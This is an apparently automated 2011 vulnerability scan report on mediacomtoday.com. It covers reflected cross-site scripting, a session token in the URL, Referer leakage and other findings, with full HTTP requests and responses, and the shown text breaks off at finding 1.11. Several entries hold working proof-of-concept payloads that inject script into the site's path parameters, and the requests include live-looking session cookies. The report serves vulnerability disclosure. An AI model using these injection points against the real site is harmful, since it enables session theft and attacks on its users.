XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, mediacomtoday.com

Report generated by XSS.CX at Mon Aug 15 09:46:48 GMT-06:00 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

XSS in mediacomtoday.com, XSS, DORK, GHDB, Cross Site Scripting, CWE-79, CAPEC-86

1.1. http://www.mediacomtoday.com/_/ [REST URL parameter 1]

1.2. http://www.mediacomtoday.com/_/ [REST URL parameter 1]

1.3. http://www.mediacomtoday.com/_/ [{"action":"slide","_uri":"component://Synacor/Portal/Components/Feed/Rss/DailyMeal/TopRated/?action parameter]

1.4. http://www.mediacomtoday.com/ads/displayad.php [REST URL parameter 1]

1.5. http://www.mediacomtoday.com/ads/displayad.php [REST URL parameter 1]

1.6. http://www.mediacomtoday.com/ads/displayad.php [REST URL parameter 2]

1.7. http://www.mediacomtoday.com/ads/displayad.php [REST URL parameter 2]

1.8. http://www.mediacomtoday.com/images/track/track.gif [REST URL parameter 3]

1.9. http://www.mediacomtoday.com/images/track/track.gif [REST URL parameter 3]

1.10. http://www.mediacomtoday.com/index.php [REST URL parameter 1]

1.11. http://www.mediacomtoday.com/index.php [REST URL parameter 1]

2. Session token in URL

3. Cross-domain Referer leakage

3.1. http://www.mediacomtoday.com/ads/displayad.php

3.2. http://www.mediacomtoday.com/ads/displayad.php

3.3. http://www.mediacomtoday.com/ads/displayad.php

3.4. http://www.mediacomtoday.com/index.php

3.5. http://www.mediacomtoday.com/index.php

3.6. http://www.mediacomtoday.com/index.php

3.7. http://www.mediacomtoday.com/index.php

3.8. http://www.mediacomtoday.com/index.php

3.9. http://www.mediacomtoday.com/index.php

3.10. http://www.mediacomtoday.com/index.php

3.11. http://www.mediacomtoday.com/index.php

3.12. http://www.mediacomtoday.com/index.php

3.13. http://www.mediacomtoday.com/index.php

3.14. http://www.mediacomtoday.com/index.php

3.15. http://www.mediacomtoday.com/index.php

3.16. http://www.mediacomtoday.com/index.php

3.17. http://www.mediacomtoday.com/index.php

3.18. http://www.mediacomtoday.com/index.php

3.19. http://www.mediacomtoday.com/index.php

3.20. http://www.mediacomtoday.com/index.php

3.21. http://www.mediacomtoday.com/index.php

3.22. http://www.mediacomtoday.com/index.php

3.23. http://www.mediacomtoday.com/index.php

3.24. http://www.mediacomtoday.com/index.php

3.25. http://www.mediacomtoday.com/index.php

3.26. http://www.mediacomtoday.com/index.php

3.27. http://www.mediacomtoday.com/index.php

3.28. http://www.mediacomtoday.com/index.php

3.29. http://www.mediacomtoday.com/index.php

3.30. http://www.mediacomtoday.com/index.php

3.31. http://www.mediacomtoday.com/index.php

3.32. http://www.mediacomtoday.com/index.php

3.33. http://www.mediacomtoday.com/index.php

3.34. http://www.mediacomtoday.com/index.php

3.35. http://www.mediacomtoday.com/index.php

3.36. http://www.mediacomtoday.com/index.php

3.37. http://www.mediacomtoday.com/index.php

4. Cross-domain script include

4.1. http://www.mediacomtoday.com/index.php

4.2. http://www.mediacomtoday.com/index.php

4.3. http://www.mediacomtoday.com/index.php

4.4. http://www.mediacomtoday.com/index.php

4.5. http://www.mediacomtoday.com/index.php

4.6. http://www.mediacomtoday.com/index.php

4.7. http://www.mediacomtoday.com/index.php

4.8. http://www.mediacomtoday.com/index.php

4.9. http://www.mediacomtoday.com/index.php

4.10. http://www.mediacomtoday.com/index.php

4.11. http://www.mediacomtoday.com/index.php

4.12. http://www.mediacomtoday.com/index.php

4.13. http://www.mediacomtoday.com/index.php

4.14. http://www.mediacomtoday.com/index.php

5. Private IP addresses disclosed

5.1. http://www.mediacomtoday.com/index.php

5.2. http://www.mediacomtoday.com/index.php

5.3. http://www.mediacomtoday.com/index.php

5.4. http://www.mediacomtoday.com/index.php

5.5. http://www.mediacomtoday.com/index.php

5.6. http://www.mediacomtoday.com/index.php

5.7. http://www.mediacomtoday.com/index.php

5.8. http://www.mediacomtoday.com/index.php

5.9. http://www.mediacomtoday.com/index.php

5.10. http://www.mediacomtoday.com/index.php



1. Cross-site scripting (reflected)  next
There are 11 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.mediacomtoday.com/_/ [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mediacomtoday.com
Path:   /_/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b582"><a>5f1753038a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /_4b582"><a>5f1753038a4/ HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/
Content-Length: 455
Origin: http://www.mediacomtoday.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-Type: application/json
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_cc=true; s_nr=1313344950958; dslv=1313344950990; dslv_s=First%20Visit; s_vnum=1315936950998%26vn%3D1; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

{"action":"slide","_uri":"component://Synacor/Portal/Components/Feed/Rss/DailyMeal/TopRated/?action=tab&position=8","_parent_uri":"component://Synacor/Portal/Components/Dcc/","_root_url":"http://www.m
...[SNIP]...

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Aug 2011 18:04:14 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 21969
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>Home-Mediacom</ti
...[SNIP]...
<div id="body_col" class="page__4b582"><a>5f1753038a4_">
...[SNIP]...

1.2. http://www.mediacomtoday.com/_/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /_/

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 3b89d--><script>alert(1)</script>d5b58112e50f3bc70 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /_3b89d--><script>alert(1)</script>d5b58112e50f3bc70/?{"action":"slide","_uri":"component://Synacor/Portal/Components/Feed/Rss/DailyMeal/TopRated/?action=tab&position=8","_parent_uri":"component://Synacor/Portal/Components/Dcc/","_root_url":"http://www.mediacomtoday.com/","_client_uri":"client://client_config/mediacom/","_site_uri":"site://site_config/mediacom/","_page_uri":"page://Synacor/Portal/Pages/Home/","_session":"f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939","_user_id":"","_auth_token":""} HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/
Origin: http://www.mediacomtoday.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_cc=true; s_nr=1313344950958; dslv=1313344950990; dslv_s=First%20Visit; s_vnum=1315936950998%26vn%3D1; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Aug 2011 18:05:07 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 23049
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>Home-Mediacom</ti
...[SNIP]...
<!-- 0 :: /_3b89d--><script>alert(1)</script>d5b58112e50f3bc70/?{"action":"slide","_uri":"component://Synacor/Portal/Components/Feed/Rss/DailyMeal/TopRated/ :: columns[yes] :: mode[w] -->
...[SNIP]...

1.3. http://www.mediacomtoday.com/_/ [{"action":"slide","_uri":"component://Synacor/Portal/Components/Feed/Rss/DailyMeal/TopRated/?action parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mediacomtoday.com
Path:   /_/

Issue detail

The value of the {"action":"slide","_uri":"component://Synacor/Portal/Components/Feed/Rss/DailyMeal/TopRated/?action request parameter is copied into the HTML document as plain text between tags. The payload a57ac<a>286d759be18 was submitted in the {"action":"slide","_uri":"component://Synacor/Portal/Components/Feed/Rss/DailyMeal/TopRated/?action parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /_/ HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/
Content-Length: 455
Origin: http://www.mediacomtoday.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Content-Type: application/json
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_cc=true; s_nr=1313344950958; dslv=1313344950990; dslv_s=First%20Visit; s_vnum=1315936950998%26vn%3D1; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

{"action":"slide","_uri":"component://Synacor/Portal/Components/Feed/Rss/DailyMeal/TopRated/?action=taba57ac<a>286d759be18&position=8","_parent_uri":"component://Synacor/Portal/Components/Dcc/","_root_url":"http://www.mediacomtoday.com/","_client_uri":"client://client_config/mediacom/","_site_uri":"site://site_config/med
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 18:03:52 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 6994
Content-Type: application/json; charset=utf-8

{"init":{"class_name":"Syn.DccSlide","description":"dcc-slide-The Daily Meal","areas":{"image":{"selector":"a img","label":"photo","multi":false},"headline":{"selector":"h3 a","label":"headline","mult
...[SNIP]...
","label":"more-link","multi":false},"promo":{"selector":"a.dcc_promo","label":"promo-link","multi":false}},"uri":"component:\/\/Synacor\/Portal\/Components\/Feed\/Rss\/DailyMeal\/TopRated\/?action=taba57ac<a>286d759be18&position=8","parent_uri":"component:\/\/Synacor\/Portal\/Components\/Dcc\/","event_id":"component-3a-2f-2fSynacor-2fPortal-2fComponents-2fDcc-2f-7ccomponent-3a-2f-2fSynacor-2fPortal-2fComponents-2fFee
...[SNIP]...

1.4. http://www.mediacomtoday.com/ads/displayad.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /ads/displayad.php

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 72036--><script>alert(1)</script>e55c34d1805 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /ads72036--><script>alert(1)</script>e55c34d1805/displayad.php?name=home_main_btf_300x250_tag HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Aug 2011 18:03:43 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 22101
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>Home-Mediacom</ti
...[SNIP]...
<!-- 0 :: /ads72036--><script>alert(1)</script>e55c34d1805/displayad.php :: columns[yes] :: mode[w] -->
...[SNIP]...

1.5. http://www.mediacomtoday.com/ads/displayad.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mediacomtoday.com
Path:   /ads/displayad.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6be8d"><a>8361e00f0f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ads6be8d"><a>8361e00f0f8/displayad.php?name=home_main_btf_300x250_tag HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Aug 2011 18:02:53 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 22050
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>Home-Mediacom</ti
...[SNIP]...
<div id="body_col" class="page_ads6be8d"><a>8361e00f0f8_displayad_php">
...[SNIP]...

1.6. http://www.mediacomtoday.com/ads/displayad.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /ads/displayad.php

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 381d9--><script>alert(1)</script>9ce11f3e942 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /ads/displayad.php381d9--><script>alert(1)</script>9ce11f3e942?name=home_main_btf_300x250_tag HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Aug 2011 18:04:16 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 22052
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>Home-Mediacom</ti
...[SNIP]...
<!-- 0 :: /ads/displayad.php381d9--><script>alert(1)</script>9ce11f3e942 :: columns[yes] :: mode[w] -->
...[SNIP]...

1.7. http://www.mediacomtoday.com/ads/displayad.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mediacomtoday.com
Path:   /ads/displayad.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2095"><a>46b6263ea0b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ads/displayad.phpb2095"><a>46b6263ea0b?name=home_main_btf_300x250_tag HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Aug 2011 18:03:45 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 22006
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>Home-Mediacom</ti
...[SNIP]...
<div id="body_col" class="page_ads_displayad_phpb2095"><a>46b6263ea0b">
...[SNIP]...

1.8. http://www.mediacomtoday.com/images/track/track.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /images/track/track.gif

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload e38b1--><script>alert(1)</script>5e8391bcf5d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /images/track/track.gife38b1--><script>alert(1)</script>5e8391bcf5d?track=dcc-impression&slide=dcc_slide_fw_news_content&position=1&ts=1313344949928 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Aug 2011 18:03:36 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 22146
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>Home-Mediacom</ti
...[SNIP]...
<!-- 0 :: /images/track/track.gife38b1--><script>alert(1)</script>5e8391bcf5d :: columns[yes] :: mode[w] -->
...[SNIP]...

1.9. http://www.mediacomtoday.com/images/track/track.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mediacomtoday.com
Path:   /images/track/track.gif

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d77b"><a>32492faa9c6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /images/track/track.gif3d77b"><a>32492faa9c6?track=dcc-impression&slide=dcc_slide_fw_news_content&position=1&ts=1313344949928 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Aug 2011 18:03:06 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 22100
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>Home-Mediacom</ti
...[SNIP]...
<div id="body_col" class="page_images_track_track_gif3d77b"><a>32492faa9c6">
...[SNIP]...

1.10. http://www.mediacomtoday.com/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d54a4"><a>1acaa62b126 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /index.phpd54a4"><a>1acaa62b126?inc=11 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=10
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313362413862; dslv=1313362413863; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Aug 2011 23:30:39 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 21960
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>Home-Mediacom</ti
...[SNIP]...
<div id="body_col" class="page_index_phpd54a4"><a>1acaa62b126">
...[SNIP]...

1.11. http://www.mediacomtoday.com/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

